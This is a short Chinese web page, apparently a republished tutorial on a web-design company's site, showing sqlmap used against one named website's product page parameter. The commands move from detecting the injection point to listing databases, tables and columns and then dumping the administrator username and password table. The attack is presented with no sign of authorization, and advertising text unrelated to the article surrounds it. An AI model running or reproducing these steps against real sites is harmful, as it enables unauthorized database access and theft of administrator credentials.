用sqlmap進(jìn)行注入
十載的雙臺子網(wǎng)站建設(shè)經(jīng)驗(yàn),針對設(shè)計、前端、開發(fā)、售后、文案、推廣等六對一服務(wù),響應(yīng)快,48小時及時工作處理。成都營銷網(wǎng)站建設(shè)的優(yōu)勢是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同,自動調(diào)整雙臺子建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設(shè)計,從而大程度地提升瀏覽體驗(yàn)。成都創(chuàng)新互聯(lián)從事“雙臺子網(wǎng)站設(shè)計”,“雙臺子網(wǎng)站推廣”以來,每個客戶項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。
1、用掃描工具可以掃出注入點(diǎn)這里我用一個注入點(diǎn)進(jìn)行說明。
sqlamp.py -u“http://www.gaoneng.com/product.php?cid=71”
可以看出此處存在sql注入漏洞。
2、
sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”
--dbs 可以跑出存在的數(shù)據(jù)庫名
然后可以跑gaoneng數(shù)據(jù)庫中的表
Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71” -D gaoneng --tables
既然已經(jīng)爆出數(shù)據(jù)庫里的表,那就可以爆出表中的字段
Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”
-D gaoneng -T com_admin --columns
可以看到這個表中存在我們需要的字段,密碼與用戶名
Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”
-D gaoneng -T com_admin -C username,password --dump
由此這個網(wǎng)站的管理員密碼與用戶名已被完全爆出。
文章標(biāo)題:sqlmap的使用
本文路徑:http://chinadenli.net/article26/jeipjg.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站設(shè)計、做網(wǎng)站、外貿(mào)建站、企業(yè)網(wǎng)站制作、ChatGPT、Google
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)